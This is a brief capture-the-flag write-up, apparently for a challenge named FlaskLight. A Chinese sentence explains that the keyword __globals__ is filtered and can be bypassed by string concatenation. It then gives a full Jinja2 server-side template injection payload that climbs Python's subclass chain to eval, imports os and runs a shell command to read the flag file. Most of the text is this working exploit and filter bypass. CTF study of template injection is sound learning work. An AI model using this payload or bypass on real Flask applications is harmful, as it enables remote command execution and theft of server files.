FlaskLight

过滤了__global__关键字,用字符串拼接绕过即可。

{{ ''.__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek').read()")}}

Last updated